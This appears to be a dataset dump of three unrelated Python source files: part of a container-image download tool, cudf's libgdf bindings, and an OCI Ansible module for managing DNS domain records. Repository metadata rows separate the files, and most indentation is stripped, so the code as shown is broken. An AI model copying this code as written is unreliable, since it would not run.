progress.update(task, advance=len(data))
fh.write(data)
# Rename partial filename to final filename
os.rename(output_path_tmp, output_path)
output_path_tmp = None
# Copy cached download if we are using the cache
if cache_path:
log.debug("Copying {} from cache: '{}'".format(container, os.path.basename(out_path)))
progress.update(task, description="Copying from cache to target directory")
shutil.copyfile(cache_path, out_path)
progress.remove_task(task)
except:
# Kill the progress bars
for t in progress.task_ids:
progress.remove_task(t)
# Try to delete the incomplete download
log.debug(f"Deleting incompleted singularity image download:\n'{output_path_tmp}'")
if output_path_tmp and os.path.exists(output_path_tmp):
os.remove(output_path_tmp)
if output_path and os.path.exists(output_path):
os.remove(output_path)
# Re-raise the caught exception
raise
def singularity_pull_image(self, container, out_path, cache_path, progress):
"""Pull a singularity image using ``singularity pull``
Attempt to use a local installation of singularity to pull the image.
Args:
container (str): A pipeline's container name. Usually it is of similar format
to ``nfcore/name:version``.
Raises:
Various exceptions possible from `subprocess` execution of Singularity.
"""
output_path = cache_path or out_path
# Pull using singularity
address = "docker://{}".format(container.replace("docker://", ""))
singularity_command = ["singularity", "pull", "--name", output_path, address]
log.debug("Building singularity image: {}".format(address))
log.debug("Singularity command: {}".format(" ".join(singularity_command)))
# Progress bar to show that something is happening
task = progress.add_task(container, start=False, total=False, progress_type="singularity_pull", current_log="")
# Run the singularity pull command
proc = subprocess.Popen(
singularity_command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
bufsize=1,
)
for line in proc.stdout:
log.debug(line.strip())
progress.update(task, current_log=line.strip())
# Copy cached download if we are using the cache
if cache_path:
log.debug("Copying {} from cache: '{}'".format(container, os.path.basename(out_path)))
progress.update(task, current_log="Copying from cache to target directory")
shutil.copyfile(cache_path, out_path)
progress.remove_task(task)
def compress_download(self):
"""Take the downloaded files and make a compressed .tar.gz archive."""
log.debug("Creating archive: {}".format(self.output_filename))
# .tar.gz and .tar.bz2 files
if self.compress_type == "tar.gz" or self.compress_type == "tar.bz2":
ctype = self.compress_type.split(".")[1]
with tarfile.open(self.output_filename, "w:{}".format(ctype)) as tar:
tar.add(self.outdir, arcname=os.path.basename(self.outdir))
tar_flags = "xzf" if ctype == "gz" else "xjf"
log.info(f"Command to extract files: [bright_magenta]tar -{tar_flags} {self.output_filename}[/]")
# .zip files
if self.compress_type == "zip":
with ZipFile(self.output_filename, "w") as zipObj:
# Iterate over all the files in directory
for folderName, subfolders, filenames in os.walk(self.outdir):
for filename in filenames:
# create complete filepath of file in directory
filePath = os.path.join(folderName, filename)
# Add file to zip
zipObj.write(filePath)
log.info(f"Command to extract files: [bright_magenta]unzip {self.output_filename}[/]")
# Delete original files
log.debug(f"Deleting uncompressed files: '{self.outdir}'")
shutil.rmtree(self.outdir)
        # Calculate md5sum for output file
self.validate_md5(self.output_filename)
def validate_md5(self, fname, expected=None):
"""Calculates the md5sum for a file on the disk and validate with expected.
Args:
fname (str): Path to a local file.
expected (str): The expected md5sum.
Raises:
IOError, if the md5sum does not match the remote sum.
"""
log.debug("Validating image hash: {}".format(fname))
# Calculate the md5 for the file on disk
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
file_hash = hash_md5.hexdigest()
if expected is None:
log.info("MD5 checksum for '{}': [blue]{}[/]".format(fname, file_hash))
else:
if file_hash == expected:
log.debug("md5 sum of image matches expected: {}".format(expected))
else:
raise IOError("{} md5 does not match remote: {} - {}".format(fname, expected, file_hash))
| 45.334994 | 189 | 0.573756 |
ad1e274774735a14b97dfd9c9f93922adba92d2f | 18,246 | py | Python | cudf/_gdf.py | Iroy30/cudf | c333f4191d8bc2dc00c1144df10e6d1f77610f8f | ["Apache-2.0"] | null | null | null | cudf/_gdf.py | Iroy30/cudf | c333f4191d8bc2dc00c1144df10e6d1f77610f8f | ["Apache-2.0"] | null | null | null | cudf/_gdf.py | Iroy30/cudf | c333f4191d8bc2dc00c1144df10e6d1f77610f8f | ["Apache-2.0"] | null | null | null | # Copyright (c) 2018, NVIDIA CORPORATION.
"""
This file provide binding to the libgdf library.
"""
import contextlib
import itertools
import numpy as np
import pandas as pd
import pyarrow as pa
from libgdf_cffi import ffi, libgdf
from librmm_cffi import librmm as rmm
from . import cudautils
from .utils import calc_chunk_size, mask_dtype, mask_bitsize
def unwrap_devary(devary):
ptrval = devary.device_ctypes_pointer.value
ptrval = ptrval or ffi.NULL # replace None with NULL
return ffi.cast('void*', ptrval)
def unwrap_mask(devary):
ptrval = devary.device_ctypes_pointer.value
ptrval = ptrval or ffi.NULL # replace None with NULL
return ffi.cast('gdf_valid_type*', ptrval), ptrval
def columnview_from_devary(devary, dtype=None):
return _columnview(size=devary.size, data=unwrap_devary(devary),
mask=ffi.NULL, dtype=dtype or devary.dtype,
null_count=0)
def _columnview(size, data, mask, dtype, null_count):
colview = ffi.new('gdf_column*')
if null_count is None:
libgdf.gdf_column_view(
colview,
data,
mask,
size,
np_to_gdf_dtype(dtype),
)
else:
libgdf.gdf_column_view_augmented(
colview,
data,
mask,
size,
np_to_gdf_dtype(dtype),
null_count,
)
return colview
def columnview(size, data, mask=None, dtype=None, null_count=None):
"""
Make a column view.
Parameters
----------
size : int
Data count.
data : Buffer
The data buffer.
mask : Buffer; optional
The mask buffer.
dtype : numpy.dtype; optional
The dtype of the data. Defaults to *data.dtype*.
"""
def unwrap(buffer):
if buffer is None:
return ffi.NULL
assert buffer.mem.is_c_contiguous(), "libGDF expects contiguous memory"
devary = buffer.to_gpu_array()
return unwrap_devary(devary)
if mask is not None:
assert null_count is not None
dtype = dtype or data.dtype
return _columnview(size=size, data=unwrap(data), mask=unwrap(mask),
dtype=dtype, null_count=null_count)
def apply_binaryop(binop, lhs, rhs, out):
"""Apply binary operator *binop* to operands *lhs* and *rhs*.
The result is stored to *out*.
Returns the number of null values.
"""
args = (lhs.cffi_view, rhs.cffi_view, out.cffi_view)
# apply binary operator
binop(*args)
# validity mask
if out.has_null_mask:
return apply_mask_and(lhs, rhs, out)
else:
return 0
def apply_unaryop(unaop, inp, out):
"""Apply unary operator *unaop* to *inp* and store to *out*.
"""
args = (inp.cffi_view, out.cffi_view)
# apply unary operator
unaop(*args)
def apply_mask_and(col, mask, out):
args = (col.cffi_view, mask.cffi_view, out.cffi_view)
libgdf.gdf_validity_and(*args)
nnz = count_nonzero_mask(out.mask.mem, size=len(out))
return len(out) - nnz
np_gdf_dict = {np.float64: libgdf.GDF_FLOAT64,
np.float32: libgdf.GDF_FLOAT32,
np.int64: libgdf.GDF_INT64,
np.int32: libgdf.GDF_INT32,
np.int16: libgdf.GDF_INT16,
np.int8: libgdf.GDF_INT8,
np.bool_: libgdf.GDF_INT8,
np.datetime64: libgdf.GDF_DATE64}
def np_to_gdf_dtype(dtype):
"""Util to convert numpy dtype to gdf dtype.
"""
if pd.api.types.is_categorical_dtype(dtype):
return libgdf.GDF_INT8
else:
return np_gdf_dict[np.dtype(dtype).type]
def gdf_to_np_dtype(dtype):
"""Util to convert gdf dtype to numpy dtype.
"""
return np.dtype({
libgdf.GDF_FLOAT64: np.float64,
libgdf.GDF_FLOAT32: np.float32,
libgdf.GDF_INT64: np.int64,
libgdf.GDF_INT32: np.int32,
libgdf.GDF_INT16: np.int16,
libgdf.GDF_INT8: np.int8,
libgdf.GDF_DATE64: np.datetime64,
libgdf.N_GDF_TYPES: np.int32,
libgdf.GDF_CATEGORY: np.int32,
}[dtype])
def np_to_pa_dtype(dtype):
"""Util to convert numpy dtype to PyArrow dtype.
"""
return {
np.float64: pa.float64(),
np.float32: pa.float32(),
np.int64: pa.int64(),
np.int32: pa.int32(),
np.int16: pa.int16(),
np.int8: pa.int8(),
np.bool_: pa.int8(),
np.datetime64: pa.date64(),
}[np.dtype(dtype).type]
def apply_reduce(fn, inp):
# allocate output+temp array
outsz = libgdf.gdf_reduce_optimal_output_size()
out = rmm.device_array(outsz, dtype=inp.dtype)
# call reduction
fn(inp.cffi_view, unwrap_devary(out), outsz)
# return 1st element
return out[0]
def apply_sort(col_keys, col_vals, ascending=True):
"""Inplace sort
"""
nelem = len(col_keys)
begin_bit = 0
end_bit = col_keys.dtype.itemsize * 8
plan = libgdf.gdf_radixsort_plan(nelem, not ascending, begin_bit, end_bit)
sizeof_key = col_keys.dtype.itemsize
sizeof_val = col_vals.dtype.itemsize
try:
libgdf.gdf_radixsort_plan_setup(plan, sizeof_key, sizeof_val)
libgdf.gdf_radixsort_generic(plan,
col_keys.cffi_view,
col_vals.cffi_view)
finally:
libgdf.gdf_radixsort_plan_free(plan)
_join_how_api = {
'inner': libgdf.gdf_inner_join,
'outer': libgdf.gdf_full_join,
'left': libgdf.gdf_left_join,
}
_join_method_api = {
'sort': libgdf.GDF_SORT,
'hash': libgdf.GDF_HASH
}
def cffi_view_to_column_mem(cffi_view):
intaddr = int(ffi.cast("uintptr_t", cffi_view.data))
data = rmm.device_array_from_ptr(intaddr,
nelem=cffi_view.size,
dtype=gdf_to_np_dtype(cffi_view.dtype),
finalizer=rmm._make_finalizer(intaddr, 0))
if cffi_view.valid:
intaddr = int(ffi.cast("uintptr_t", cffi_view.valid))
mask = rmm.device_array_from_ptr(intaddr,
nelem=calc_chunk_size(cffi_view.size,
mask_bitsize),
dtype=mask_dtype,
finalizer=rmm._make_finalizer(intaddr,
0))
else:
mask = None
return data, mask
@contextlib.contextmanager
def apply_join(col_lhs, col_rhs, how, method='hash'):
"""Returns a tuple of the left and right joined indices as gpu arrays.
"""
if(len(col_lhs) != len(col_rhs)):
msg = "Unequal #columns in list 'col_lhs' and list 'col_rhs'"
raise ValueError(msg)
joiner = _join_how_api[how]
method_api = _join_method_api[method]
gdf_context = ffi.new('gdf_context*')
if method == 'hash':
libgdf.gdf_context_view(gdf_context, 0, method_api, 0, 0, 0)
elif method == 'sort':
libgdf.gdf_context_view(gdf_context, 1, method_api, 0, 0, 0)
else:
msg = "method not supported"
raise ValueError(msg)
col_result_l = columnview(0, None, dtype=np.int32)
col_result_r = columnview(0, None, dtype=np.int32)
if(how in ['left', 'inner']):
list_lhs = []
list_rhs = []
for i in range(len(col_lhs)):
list_lhs.append(col_lhs[i].cffi_view)
list_rhs.append(col_rhs[i].cffi_view)
# Call libgdf
joiner(len(col_lhs), list_lhs, list_rhs, col_result_l,
col_result_r, gdf_context)
else:
joiner(col_lhs[0].cffi_view, col_rhs[0].cffi_view, col_result_l,
col_result_r)
# Extract result
left = rmm.device_array_from_ptr(ptr=col_result_l.data,
nelem=col_result_l.size,
dtype=np.int32)
right = rmm.device_array_from_ptr(ptr=col_result_r.data,
nelem=col_result_r.size,
dtype=np.int32)
yield(left, right)
libgdf.gdf_column_free(col_result_l)
libgdf.gdf_column_free(col_result_r)
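# Illustrative sketch (not part of the original module): apply_join is a context manager,
# so the joined GPU index arrays are only guaranteed valid inside the `with` block:
#     with apply_join([left_key_col], [right_key_col], how='inner') as (l_idx, r_idx):
#         ...  # gather rows with l_idx / r_idx before the result columns are freed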
def libgdf_join(col_lhs, col_rhs, on, how, method='sort'):
joiner = _join_how_api[how]
method_api = _join_method_api[method]
gdf_context = ffi.new('gdf_context*')
libgdf.gdf_context_view(gdf_context, 0, method_api, 0, 0, 0)
if how not in ['left', 'inner', 'outer']:
msg = "new join api only supports left or inner"
raise ValueError(msg)
list_lhs = []
list_rhs = []
result_cols = []
result_col_names = []
left_idx = []
right_idx = []
# idx = 0
for name, col in col_lhs.items():
list_lhs.append(col._column.cffi_view)
if name not in on:
result_cols.append(columnview(0, None, dtype=col._column.dtype))
result_col_names.append(name)
for name in on:
result_cols.append(columnview(0, None,
dtype=col_lhs[name]._column.dtype))
result_col_names.append(name)
left_idx.append(list(col_lhs.keys()).index(name))
right_idx.append(list(col_rhs.keys()).index(name))
for name, col in col_rhs.items():
list_rhs.append(col._column.cffi_view)
if name not in on:
result_cols.append(columnview(0, None, dtype=col._column.dtype))
result_col_names.append(name)
num_cols_to_join = len(on)
result_num_cols = len(list_lhs) + len(list_rhs) - num_cols_to_join
joiner(list_lhs,
len(list_lhs),
left_idx,
list_rhs,
len(list_rhs),
right_idx,
num_cols_to_join,
result_num_cols,
result_cols,
ffi.NULL,
ffi.NULL,
gdf_context)
res = []
valids = []
for col in result_cols:
intaddr = int(ffi.cast("uintptr_t", col.data))
res.append(rmm.device_array_from_ptr(ptr=intaddr,
nelem=col.size,
dtype=gdf_to_np_dtype(col.dtype),
finalizer=rmm._make_finalizer(
intaddr, 0)))
intaddr = int(ffi.cast("uintptr_t", col.valid))
valids.append(rmm.device_array_from_ptr(ptr=intaddr,
nelem=calc_chunk_size(
col.size, mask_bitsize),
dtype=mask_dtype,
finalizer=rmm._make_finalizer(
intaddr, 0)))
return res, valids
def apply_prefixsum(col_inp, col_out, inclusive):
libgdf.gdf_prefixsum_generic(col_inp, col_out, inclusive)
def apply_segsort(col_keys, col_vals, segments, descending=False,
plan=None):
"""Inplace segemented sort
Parameters
----------
col_keys : Column
col_vals : Column
segments : device array
"""
# prepare
nelem = len(col_keys)
if nelem == segments.size:
        # As many segments as there are elements.
# Nothing to do.
return
if plan is None:
plan = SegmentedRadixortPlan(nelem, col_keys.dtype, col_vals.dtype,
descending=descending)
plan.sort(segments, col_keys, col_vals)
return plan
class SegmentedRadixortPlan(object):
def __init__(self, nelem, key_dtype, val_dtype, descending=False):
begin_bit = 0
self.sizeof_key = key_dtype.itemsize
self.sizeof_val = val_dtype.itemsize
end_bit = self.sizeof_key * 8
plan = libgdf.gdf_segmented_radixsort_plan(nelem, descending,
begin_bit, end_bit)
self.plan = plan
self.nelem = nelem
self.is_closed = False
self.setup()
def __del__(self):
if not self.is_closed:
self.close()
def close(self):
libgdf.gdf_segmented_radixsort_plan_free(self.plan)
self.is_closed = True
self.plan = None
def setup(self):
libgdf.gdf_segmented_radixsort_plan_setup(self.plan, self.sizeof_key,
self.sizeof_val)
def sort(self, segments, col_keys, col_vals):
seg_dtype = np.uint32
segsize_limit = 2 ** 16 - 1
d_fullsegs = rmm.device_array(segments.size + 1, dtype=seg_dtype)
d_begins = d_fullsegs[:-1]
d_ends = d_fullsegs[1:]
# Note: .astype is required below because .copy_to_device
# is just a plain memcpy
d_begins.copy_to_device(cudautils.astype(segments, dtype=seg_dtype))
d_ends[-1:].copy_to_device(np.require([self.nelem], dtype=seg_dtype))
        # The following is to handle the segment size limit due to
# max CUDA grid size.
range0 = range(0, segments.size, segsize_limit)
range1 = itertools.chain(range0[1:], [segments.size])
for s, e in zip(range0, range1):
segsize = e - s
libgdf.gdf_segmented_radixsort_generic(self.plan,
col_keys.cffi_view,
col_vals.cffi_view,
segsize,
unwrap_devary(d_begins[s:]),
unwrap_devary(d_ends[s:]))
def hash_columns(columns, result):
"""Hash the *columns* and store in *result*.
Returns *result*
"""
assert len(columns) > 0
assert result.dtype == np.int32
# No-op for 0-sized
if len(result) == 0:
return result
col_input = [col.cffi_view for col in columns]
col_out = result.cffi_view
ncols = len(col_input)
hashfn = libgdf.GDF_HASH_MURMUR3
libgdf.gdf_hash(ncols, col_input, hashfn, col_out)
return result
def hash_partition(input_columns, key_indices, nparts, output_columns):
"""Partition the input_columns by the hash values on the keys.
Parameters
----------
input_columns : sequence of Column
key_indices : sequence of int
Indices into `input_columns` that indicates the key columns.
nparts : int
number of partitions
Returns
-------
partition_offsets : list of int
Each index indicates the start of a partition.
"""
assert len(input_columns) == len(output_columns)
col_inputs = [col.cffi_view for col in input_columns]
col_outputs = [col.cffi_view for col in output_columns]
offsets = ffi.new('int[]', nparts)
hashfn = libgdf.GDF_HASH_MURMUR3
libgdf.gdf_hash_partition(
len(col_inputs),
col_inputs,
key_indices,
len(key_indices),
nparts,
col_outputs,
offsets,
hashfn
)
offsets = list(offsets)
return offsets
def count_nonzero_mask(mask, size):
assert mask.size * mask_bitsize >= size
nnz = ffi.new('int*')
nnz[0] = 0
mask_ptr, addr = unwrap_mask(mask)
if addr != ffi.NULL:
libgdf.gdf_count_nonzero_mask(mask_ptr, size, nnz)
return nnz[0]
_GDF_COLORS = {
'green': libgdf.GDF_GREEN,
'blue': libgdf.GDF_BLUE,
'yellow': libgdf.GDF_YELLOW,
'purple': libgdf.GDF_PURPLE,
'cyan': libgdf.GDF_CYAN,
'red': libgdf.GDF_RED,
'white': libgdf.GDF_WHITE,
'darkgreen': libgdf.GDF_DARK_GREEN,
'orange': libgdf.GDF_ORANGE,
}
def str_to_gdf_color(s):
"""Util to convert str to gdf_color type.
"""
return _GDF_COLORS[s.lower()]
def nvtx_range_push(name, color='green'):
"""
Demarcate the beginning of a user-defined NVTX range.
Parameters
----------
name : str
The name of the NVTX range
color : str
The color to use for the range.
Can be named color or hex RGB string.
"""
name_c = ffi.new("char[]", name.encode('ascii'))
try:
color = int(color, 16) # only works if color is a hex string
libgdf.gdf_nvtx_range_push_hex(name_c, ffi.cast('unsigned int', color))
except ValueError:
color = str_to_gdf_color(color)
libgdf.gdf_nvtx_range_push(name_c, color)
def nvtx_range_pop():
""" Demarcate the end of the inner-most range.
"""
libgdf.gdf_nvtx_range_pop()
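# Illustrative sketch (not part of the original module): bracket a region of GPU work
# with NVTX markers so it appears as a named range in profilers such as Nsight:
#     nvtx_range_push("join", color="blue")
#     ...  # GPU work to profile
#     nvtx_range_pop()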
def rmm_initialize():
rmm.initialize()
return True
def rmm_finalize():
rmm.finalize()
return True
_GDF_QUANTILE_METHODS = {
'linear': libgdf.GDF_QUANT_LINEAR,
'lower': libgdf.GDF_QUANT_LOWER,
'higher': libgdf.GDF_QUANT_HIGHER,
'midpoint': libgdf.GDF_QUANT_MIDPOINT,
'nearest': libgdf.GDF_QUANT_NEAREST,
}
def get_quantile_method(method):
"""Util to convert method to gdf gdf_quantile_method.
"""
return _GDF_QUANTILE_METHODS[method]
def quantile(column, quant, method, exact):
""" Calculate the `quant` quantile for the column
Returns value with the quantile specified by quant
"""
gdf_context = ffi.new('gdf_context*')
method_api = _join_method_api['sort']
libgdf.gdf_context_view(gdf_context, 0, method_api, 0, 0, 0)
# libgdf.gdf_context_view(gdf_context, 0, method_api, 0)
# px = ffi.new("double *")
res = []
for q in quant:
px = ffi.new("double *")
if exact:
libgdf.gdf_quantile_exact(column.cffi_view,
get_quantile_method(method),
q,
ffi.cast('void *', px),
gdf_context)
else:
libgdf.gdf_quantile_aprrox(column.cffi_view,
q,
ffi.cast('void *', px),
gdf_context)
res.append(px[0])
return res
| 29.960591 | 79 | 0.580675 |
5a9a13923c92a553c0ce88bfd2968fc0adeff35a | 20,357 | py | Python | plugins/modules/oci_dns_domain_records.py | sagar2938/oci-ansible-collection | 5b8ce583a0d5d0aabf14494d61aea4649e18d1e6 | ["Apache-2.0"] | null | null | null | plugins/modules/oci_dns_domain_records.py | sagar2938/oci-ansible-collection | 5b8ce583a0d5d0aabf14494d61aea4649e18d1e6 | ["Apache-2.0"] | null | null | null | plugins/modules/oci_dns_domain_records.py | sagar2938/oci-ansible-collection | 5b8ce583a0d5d0aabf14494d61aea4649e18d1e6 | ["Apache-2.0"] | null | null | null | #!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_dns_domain_records
short_description: Manage a DomainRecords resource in Oracle Cloud Infrastructure
description:
- This module allows the user to update, patch and delete a DomainRecords resource in Oracle Cloud Infrastructure
- This module does not support check mode
version_added: "2.9.0"
author: Oracle (@oracle)
options:
zone_name_or_id:
description:
- The name or OCID of the target zone.
type: str
aliases: ["zone_id", "name", "zone_name", "id"]
required: true
domain:
description:
- The target fully-qualified domain name (FQDN) within the target zone.
type: str
required: true
update_items:
description:
- ""
- This parameter is updatable.
type: list
elements: dict
suboptions:
domain:
description:
- The fully qualified domain name where the record can be located.
- This parameter is updatable.
type: str
required: true
record_hash:
description:
- A unique identifier for the record within its zone.
- This parameter is updatable.
type: str
is_protected:
description:
- A Boolean flag indicating whether or not parts of the record
are unable to be explicitly managed.
- This parameter is updatable.
type: bool
rdata:
description:
- The record's data, as whitespace-delimited tokens in
type-specific presentation format. All RDATA is normalized and the
returned presentation of your RDATA may differ from its initial input.
For more information about RDATA, see L(Supported DNS Resource Record
Types,https://docs.cloud.oracle.com/iaas/Content/DNS/Reference/supporteddnsresource.htm)
- This parameter is updatable.
type: str
required: true
rrset_version:
description:
- The latest version of the record's zone in which its RRSet differs
from the preceding version.
- This parameter is updatable.
type: str
rtype:
description:
- The type of DNS record, such as A or CNAME. For more information, see L(Resource Record (RR) TYPEs,https://www.iana.org/assignments/dns-
parameters/dns-parameters.xhtml#dns-parameters-4).
- This parameter is updatable.
type: str
required: true
ttl:
description:
- The Time To Live for the record, in seconds.
- This parameter is updatable.
type: int
required: true
if_unmodified_since:
description:
- The `If-Unmodified-Since` header field makes the request method
conditional on the selected representation's last modification date being
earlier than or equal to the date provided in the field-value. This
field accomplishes the same purpose as If-Match for cases where the user
agent does not have an entity-tag for the representation.
- This parameter is updatable.
type: str
scope:
description:
- Specifies to operate only on resources that have a matching DNS scope.
- This parameter is updatable.
type: str
choices:
- "GLOBAL"
- "PRIVATE"
view_id:
description:
- The OCID of the view the resource is associated with.
- This parameter is updatable.
type: str
compartment_id:
description:
- The OCID of the compartment the resource belongs to.
- This parameter is updatable.
type: str
patch_items:
description:
- ""
type: list
elements: dict
suboptions:
domain:
description:
- The fully qualified domain name where the record can be located.
type: str
record_hash:
description:
- A unique identifier for the record within its zone.
type: str
is_protected:
description:
- A Boolean flag indicating whether or not parts of the record
are unable to be explicitly managed.
type: bool
rdata:
description:
- The record's data, as whitespace-delimited tokens in
type-specific presentation format. All RDATA is normalized and the
returned presentation of your RDATA may differ from its initial input.
For more information about RDATA, see L(Supported DNS Resource Record
Types,https://docs.cloud.oracle.com/iaas/Content/DNS/Reference/supporteddnsresource.htm)
type: str
rrset_version:
description:
- The latest version of the record's zone in which its RRSet differs
from the preceding version.
type: str
rtype:
description:
- The type of DNS record, such as A or CNAME. For more information, see L(Resource Record (RR) TYPEs,https://www.iana.org/assignments/dns-
parameters/dns-parameters.xhtml#dns-parameters-4).
type: str
ttl:
description:
- The Time To Live for the record, in seconds.
type: int
operation:
description:
- A description of how a record relates to a PATCH operation.
- "- `REQUIRE` indicates a precondition that record data **must** already exist.
- `PROHIBIT` indicates a precondition that record data **must not** already exist.
- `ADD` indicates that record data **must** exist after successful application.
- `REMOVE` indicates that record data **must not** exist after successful application."
- " **Note:** `ADD` and `REMOVE` operations can succeed even if
they require no changes when applied, such as when the described
records are already present or absent."
- " **Note:** `ADD` and `REMOVE` operations can describe changes for
more than one record."
- " **Example:** `{ \\"domain\\": \\"www.example.com\\", \\"rtype\\": \\"AAAA\\", \\"ttl\\": 60 }`
specifies a new TTL for every record in the www.example.com AAAA RRSet."
type: str
choices:
- "REQUIRE"
- "PROHIBIT"
- "ADD"
- "REMOVE"
state:
description:
- The state of the DomainRecords.
- Use I(state=present) to update an existing a DomainRecords.
- Use I(state=absent) to delete a DomainRecords.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: Update domain_records
oci_dns_domain_records:
# required
zone_name_or_id: "ocid1.zonenameor.oc1..xxxxxxEXAMPLExxxxxx"
domain: domain_example
# optional
update_items:
- # required
domain: www.example.com
rdata: v=spf1 include:example.net -all
rtype: TXT
ttl: 30
# optional
record_hash: 8f356bd7e9c2007c5c898f441fb663e9
is_protected: false
rrset_version: 9
if_unmodified_since: if_unmodified_since_example
scope: GLOBAL
view_id: "ocid1.view.oc1..xxxxxxEXAMPLExxxxxx"
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
- name: Delete domain_records
oci_dns_domain_records:
# required
zone_name_or_id: "ocid1.zonenameor.oc1..xxxxxxEXAMPLExxxxxx"
domain: domain_example
state: absent
# optional
if_unmodified_since: if_unmodified_since_example
scope: GLOBAL
view_id: "ocid1.view.oc1..xxxxxxEXAMPLExxxxxx"
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
"""
RETURN = """
domain_records:
description:
- Details of the DomainRecords resource acted upon by the current operation
returned: on success
type: complex
contains:
domain:
description:
- The fully qualified domain name where the record can be located.
returned: on success
type: str
sample: domain_example
record_hash:
description:
- A unique identifier for the record within its zone.
returned: on success
type: str
sample: record_hash_example
is_protected:
description:
- A Boolean flag indicating whether or not parts of the record
are unable to be explicitly managed.
returned: on success
type: bool
sample: true
rdata:
description:
- The record's data, as whitespace-delimited tokens in
type-specific presentation format. All RDATA is normalized and the
returned presentation of your RDATA may differ from its initial input.
For more information about RDATA, see L(Supported DNS Resource Record
Types,https://docs.cloud.oracle.com/iaas/Content/DNS/Reference/supporteddnsresource.htm)
returned: on success
type: str
sample: rdata_example
rrset_version:
description:
- The latest version of the record's zone in which its RRSet differs
from the preceding version.
returned: on success
type: str
sample: rrset_version_example
rtype:
description:
                - The type of DNS record, such as A or CNAME. For more information, see L(Resource Record (RR) TYPEs,https://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4).
returned: on success
type: str
sample: rtype_example
ttl:
description:
- The Time To Live for the record, in seconds.
returned: on success
type: int
sample: 56
sample: {
"domain": "domain_example",
"record_hash": "record_hash_example",
"is_protected": true,
"rdata": "rdata_example",
"rrset_version": "rrset_version_example",
"rtype": "rtype_example",
"ttl": 56
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.dns import DnsClient
from oci.dns.models import UpdateDomainRecordsDetails
from oci.dns.models import PatchDomainRecordsDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class DomainRecordsHelperGen(OCIResourceHelperBase):
"""Supported operations: update, patch, get and delete"""
def get_module_resource_id_param(self):
return "domain"
def get_module_resource_id(self):
return self.module.params.get("domain")
def get_get_fn(self):
return self.client.get_domain_records
def get_resource(self):
optional_params = [
"scope",
"view_id",
"compartment_id",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_params
if self.module.params.get(param) is not None
)
return oci_common_utils.get_default_response_from_resource(
oci_common_utils.list_all_resources(
self.client.get_domain_records,
zone_name_or_id=self.module.params.get("zone_name_or_id"),
domain=self.module.params.get("domain"),
**optional_kwargs
).items
)
def get_update_model_class(self):
return UpdateDomainRecordsDetails
def update_resource(self):
update_details = self.get_update_model()
optional_enum_params = [
"scope",
]
optional_enum_kwargs = dict(
(param, self.module.params[param])
for param in optional_enum_params
if self.module.params.get(param) is not None
)
return oci_wait_utils.call_and_wait(
call_fn=self.client.update_domain_records,
call_fn_args=(),
call_fn_kwargs=dict(
zone_name_or_id=self.module.params.get("zone_name_or_id"),
domain=self.module.params.get("domain"),
update_domain_records_details=update_details,
if_unmodified_since=self.module.params.get("if_unmodified_since"),
view_id=self.module.params.get("view_id"),
compartment_id=self.module.params.get("compartment_id"),
**optional_enum_kwargs
),
waiter_type=oci_wait_utils.NONE_WAITER_KEY,
operation=oci_common_utils.UPDATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.UPDATE_OPERATION_KEY,
),
)
def get_patch_model_class(self):
return PatchDomainRecordsDetails
def patch_resource(self):
patch_details = self.get_patch_model()
optional_enum_params = [
"scope",
]
optional_enum_kwargs = dict(
(param, self.module.params[param])
for param in optional_enum_params
if self.module.params.get(param) is not None
)
return oci_wait_utils.call_and_wait(
call_fn=self.client.patch_domain_records,
call_fn_args=(),
call_fn_kwargs=dict(
zone_name_or_id=self.module.params.get("zone_name_or_id"),
domain=self.module.params.get("domain"),
patch_domain_records_details=patch_details,
if_unmodified_since=self.module.params.get("if_unmodified_since"),
view_id=self.module.params.get("view_id"),
compartment_id=self.module.params.get("compartment_id"),
**optional_enum_kwargs
),
waiter_type=oci_wait_utils.NONE_WAITER_KEY,
operation=oci_common_utils.PATCH_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.PATCH_OPERATION_KEY,
),
)
def delete_resource(self):
optional_enum_params = [
"scope",
]
optional_enum_kwargs = dict(
(param, self.module.params[param])
for param in optional_enum_params
if self.module.params.get(param) is not None
)
return oci_wait_utils.call_and_wait(
call_fn=self.client.delete_domain_records,
call_fn_args=(),
call_fn_kwargs=dict(
zone_name_or_id=self.module.params.get("zone_name_or_id"),
domain=self.module.params.get("domain"),
if_unmodified_since=self.module.params.get("if_unmodified_since"),
view_id=self.module.params.get("view_id"),
compartment_id=self.module.params.get("compartment_id"),
**optional_enum_kwargs
),
waiter_type=oci_wait_utils.NONE_WAITER_KEY,
operation=oci_common_utils.DELETE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.DELETE_OPERATION_KEY,
),
)
def is_resource_dead(self, resource):
# response model returns a collection. Consider existence of a value as active.
if not resource:
return True
return False
DomainRecordsHelperCustom = get_custom_class("DomainRecordsHelperCustom")
